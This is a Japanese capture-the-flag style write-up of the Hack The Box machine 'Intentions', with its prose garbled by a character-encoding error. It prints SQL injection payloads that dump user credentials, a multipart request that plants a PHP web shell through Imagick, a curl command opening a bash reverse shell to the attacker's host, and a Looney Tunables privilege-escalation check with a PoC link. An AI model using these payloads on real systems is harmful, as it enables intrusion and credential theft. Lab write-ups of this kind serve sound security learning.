ç®æ¬¡
- ç®æ¬¡
- åµå¯ï¼ã¹ãã£ã³
- ã¢ã¯ã»ã¹åå¾
- 権éææ ¼
- åèã«ããã¦ããã ãããµã¤ã
- ãã®ä»
Â
Â
Â
åµå¯ï¼ã¹ãã£ã³
nmapã§ã¹ãã£ã³ãã¾ãã
-p-ã§ã¹ãã£ã³ãã確èªã§ãããã¼ãã«è©³ç´°ãªã¹ãã£ã³ãè¡ãã¾ãã
âââ(kaliã¿kali)-[~/htb/intentions] ââ$ sudo nmap -sC -sV -A -O -p22,80 10.10.11.220 Nmap scan report for 10.10.11.220
Host is up (0.20s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA) |_ 256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Intentions
|_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linu
x 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 213.43 ms 10.10.14.1 2 213.90 ms 10.10.11.220
TCP/80ã®èª¿æ»
ãã©ã¦ã¶ã§ã¢ã¯ã»ã¹ããã¨ä»¥ä¸ã®ãããªãã¼ã¸ã表示ããã¾ãã
ãREGISTERãããæ°è¦ã®ã¢ã«ã¦ã³ããä½æã§ããä½æããã¢ã«ã¦ã³ãã§ãã°ã¤ã³ã§ãã¾ãã
Â
Â
ãã°ã¤ã³å¾ã®ç»é¢ã§ããYour Profileãã®å 容ã§ãYour Feedãã«è¡¨ç¤ºãããå 容ãå¤åãããã¨ã確èªã§ãã¾ãã
ã' or 1=1--ãã¨å ¥åãã¦ãYour Feedãã«ã¢ã¯ã»ã¹ããã¨ãç»é¢ä¸ã¯ä½ã表示ããã¾ããããBurpã§è¦ãã¨Server Errorï¼500ï¼ã確èªã§ãã¾ãã
500ã¨ã©ã¼ã«ã¤ãã¦
Â
ãFavorite Genresãã§ã¯ã¹ãã¼ã¹ãå«ãã¤ã³ã¸ã§ã¯ã·ã§ã³ã®ã¯ã¨ãªã¯æåããªãçºãã¹ãã¼ã¹ãã³ã¡ã³ãã«ç½®ãæãã¦å®è¡ãã¾ãã
以ä¸ã®ã¯ã¨ãªãå ¥åãã¦å®è¡ããã¨SQLiãæåãã¾ãã
')/**/or/**/1=1#
Â
Burpã§ã¿ãã¨ã¬ã¹ãã³ã¹ã¨ãã¦6ã¤ã®ã«ã©ã ããããã¨ããããã¾ãã
UNIONã使ç¨ãã¦ãã¼ã¿ãã¼ã¹ã®å
容ã調æ»ãã¾ãã
ä¸è¨ã«ã©ã ã®å
ããURLãã¯ãfileãããçæã§ãããã5åã®ã«ã©ã ã§å®è¡ãã¾ãã
')/**/UNION/**/SELECT/**/1,2,3,4,5#
Â
2çªç®ããã³3çªç®ã®ã«ã©ã ãStringã®çºã2çªç®ã«ãuser()ãã3çªç®ã«ãdatabase()ããæå®ãã¦å®è¡ãã¾ãã
- user(): ãã¼ã¿ãã¼ã¹æ¥ç¶ã«ä½¿ç¨ããã¦ããã¦ã¼ã¶ã¼åãåå¾
- database(): ç¾å¨ã®ãã¼ã¿ãã¼ã¹åãåå¾
Â
')/**/UNION/**/SELECT/**/1,user(),database(),4,5#
Â
ä¸è¨ãããã¼ã¿ãã¼ã¹ã«æ¥ç¶ãã¦ããã¦ã¼ã¶ï¼laravel@localhostï¼ããã³ããã¼ã¿ãã¼ã¹åï¼intentionsï¼ãåå¾ã§ãã¾ãã
')/**/UNION/**/SELECT/**/1,table_schema,table_name,4,5/**/from/**/information_schema.tables/**/where/**/table_schema/**/!=/**/'information_schema'#
Â
次ã«ãã¼ã¿ãã¼ã¹ã¨ãã¼ãã«æ å ±ãåå¾ãã¾ãã
')/**/UNION/**/SELECT/**/1,table_schema,table_name,4,5/**/from/**/information_schema.tables/**/where/**/table_schema/**/!=/**/'information_schema'#
ãã¼ã¿ãã¼ã¹ãintentionsãå ã®4ã¤ã®ãã¼ãã«ã®å ãusersã«ã¤ãã¦èª¿æ»ãé²ãã¾ãã
')/**/UNION/**/SELECT/**/1,2,column_name,4,5/**/from/**/information_schema.columns/**/where/**/table_name='users'#
ä¸è¨æ å ±ããã¨ã«ä»¥ä¸ã®ã¯ã¨ãªãå ¥åãããã¨ã§ãã¦ã¼ã¶ã¼æ å ±ãåå¾ã§ãã¾ãã
')/**/UNION/**/SELECT/**/1,2,concat(name,':',email,':',admin,':',password,':',genres),4,5/**/from/**/users#
ä¸è¨ã§åå¾ã§ããã¢ã«ã¦ã³ãã¯GUIã®ãã°ã¤ã³ç»é¢ã§ã¯ä½¿ç¨ã§ãã¾ããã
ãã°ã¤ã³æã«ã¯/api/v1/auth/loginã«èªè¨¼æ å ±ãPOSTãã¦ãã¾ãã
/js/admin.jsã®ã³ã¡ã³ãã§ã¯ãèªè¨¼æã«ã¢ã«ã¦ã³ãæ å ±ãå¹³æã§éãããªããã¨ã触ãããã¦ãã¾ãã
Â
v2ã®ã³ã¡ã³ãå 容ã«æ²¿ã£ã¦ãªã¯ã¨ã¹ããç·¨éããä¸è¨ã®ã¢ã«ã¦ã³ãã§POSTããã¨ãã°ã¤ã³ã§ãã¾ãã
ããã«/adminã«ã¢ã¯ã»ã¹ããã¨ç®¡çè ç»é¢ã«ã¢ã¯ã»ã¹ã§ãã¾ãã
Â
Â
ã¢ã¯ã»ã¹åå¾
ãimageãã§ã¯ç»åãã¡ã¤ã«ã®ç·¨éãã§ãã¾ãã
ç»åç·¨éã«ã¯Imagickã使ç¨ããã¦ãããã¨ãJavascriptã®ã³ã¡ã³ããã確èªã§ãã¾ãã
Imagickã«ã¤ãã¦èª¿ã¹ãã¨ä»¥ä¸ã®ãµã¤ããè¦ã¤ããã¾ãã
Â
ã¾ããBoxã§ã¯ãEffectsããã¯ãªãã¯ããã¨/api/v2/admin/image/modifyã«POSTãéä¿¡ããã¾ãã
POSTãBurpã§ä»¥ä¸ã®ããã«ç·¨éãã¾ãã
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=XXX HTTP/1.1 Host: 10.10.11.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, text/plain, */* Accept-Language: ja,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=ABC X-XSRF-TOKEN: eyJpdiI6Ijk0a1daSGVncVVwVFdER1hFdFV1Nnc9PSIsInZhbHVlIjoiRXZFUCsybzhWb3pyRG5oRXNQb1NEeDVSQkdGRW5EZmxKWjM4S3BGZ0pXaVBwNXFaUkFKVlZ0aFdiaVNIYXduZ2wydC9GZFdZdEp6d2g2dCtZd2RHcDVTMnRDUkxMcnBCd0E2L0xKWU9uY0doOFgvWXVoZ2pOMEtmUmhVQk8yVXEiLCJtYWMiOiI3ZTIzN2UyYzE1ZTQzMTZlYjNlMjRiMWFhNDg2OTQ4MDcyMzMwMTk4ZjdlN2E0NmRkYWRiMGJkYTE0NGFmZGQ4IiwidGFnIjoiIn0= Content-Length: 401 Origin: http://10.10.11.220 Connection: close Referer: http://10.10.11.220/admin Cookie: XSRF-TOKEN=eyJpdiI6Ijk0a1daSGVncVVwVFdER1hFdFV1Nnc9PSIsInZhbHVlIjoiRXZFUCsybzhWb3pyRG5oRXNQb1NEeDVSQkdGRW5EZmxKWjM4S3BGZ0pXaVBwNXFaUkFKVlZ0aFdiaVNIYXduZ2wydC9GZFdZdEp6d2g2dCtZd2RHcDVTMnRDUkxMcnBCd0E2L0xKWU9uY0doOFgvWXVoZ2pOMEtmUmhVQk8yVXEiLCJtYWMiOiI3ZTIzN2UyYzE1ZTQzMTZlYjNlMjRiMWFhNDg2OTQ4MDcyMzMwMTk4ZjdlN2E0NmRkYWRiMGJkYTE0NGFmZGQ4IiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6InBucExiZk1WUjQvVjV0WUVlQncyc3c9PSIsInZhbHVlIjoiT29za1JoWnBZRzZLaDJRdjlrTVEvT3hsRGdYZmdBbmtjS0MyM043TGllR0dlUDVrclBGSzN3Vkc5MEpQWFM4MUxTajVrV3RaZUJ6K0k4VWZZRjFUS2drc2ZhNzhIdlY2bEV3eERIWXZRbC9DdlZwc2xiNmg3UGpDZHovMzlGRWEiLCJtYWMiOiJkMjM2NzQ3ZDhiZWUwMDU1OGJmZWFkNGNkOGRmNGI0YjQ2NjI3NzEwMGVmMjliMjg1NTMxOTM4Yzc4OGRiNmIwIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNzM0MjY3ODc2LCJleHAiOjE3MzQyODk0NzYsIm5iZiI6MTczNDI2Nzg3NiwianRpIjoidVlKR0FiQWhJb05GaEtUWCIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.fBzPR4bZc0c20dE1Thadq6WOT83OryGEYy_pHzguBF4 Priority: u=0 --ABC Content-Disposition: form-data; name="shell";filename="shell.msl" Content-Type:text/plain <ï¼--?xml version="1.0" encoding="UTF-8"?--> ï¼read filename="caption:<?php system($_GET['cmd']); ?>"> ï¼write filename="info:/var/www/html/intentions/storage/app/public/test.php"> ï¼/write> --ABC--
ä¸è¨ã®ãªã¯ã¨ã¹ãã¯502ã®ã¨ã©ã¼ã¨ãªãã°æåã§ãããªã¯ã¨ã¹ãã«èª¤ããããå ´åã¯422ã®ã¨ã©ã¼ã¨ãªãã¾ãã
ãªã¯ã¨ã¹ãã®éä¿¡å¾ããã¡ã¤ã«ã«ã¢ã¯ã»ã¹ãã¾ãã
curl http://10.10.11.220/storage/test.php -d 'cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.3/4444 0>%261"'Â
Â
ãwww-dataãã§ã·ã§ã«ãåå¾ã§ãã¾ãã
www-dataã§ã¯user.txtãåå¾ã§ããªãã®ã§æ¨ªå±éãè¡ãã¾ãã
/var/www/html/intentionsã«ã.gitãããããã¨ã確èªã§ãã¾ããä¸è¨ããã¼ã«ã«ã«ç§»åãã¾ãã
tarå½¢å¼ã«ãã¦ncçµç±ã§ç§»åãã¾ãã
ãã¼ã«ã«ç§»åå¾ã«tarãå±éããCommitã®å¤æ´å±¥æ´ã確èªãã¾ãã
å±¥æ´ããããã¼ãã³ã¼ããããèªè¨¼æ å ±ã確èªã§ãã¾ãã
git diff d7ef022 36b4287Â
ä¸è¨ã§ç¢ºèªã§ãããgregãã§SSHã¢ã¯ã»ã¹ãã¦ã¼ã¶ãã©ã°ãåå¾ã§ãã¾ãã
Â
Â
権éææ ¼
ãã®Boxã«ã¯ãLooney Tunablesãã®èå¼±æ§ãããã¾ãã
èå¼±æ§ããããã¯ä»¥ä¸ã®ã³ãã³ãã§ç¢ºèªã§ãã¾ãã
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Â
ä¸è¨ã®èå¼±æ§ã«å¯¾ãã¦ã¯ä»¥ä¸ã®PoCãå ¬éããã¦ããã¾ãã
https://haxx.in/files/gnu-acme.py
Â
ä¸è¨ã®PoCãBoxã«ç§»åãå®è¡ããã¨rootãåå¾ã§ãã¾ãã
ä»åãåãã¦ãHardãã®Boxãããã¾ããããããã¤ãã®WriteUPãæè¦ãã¾ããããå 容ãç解ã§ãã¦ããªãé¨åãå¤ãæ®ãã¾ããã
Â
åèã«ããã¦ããã ãããµã¤ã
è²´éãªæ å ±ããããã¨ããããã¾ãã
ãã®ä»
Â
Â
Â
Â
Â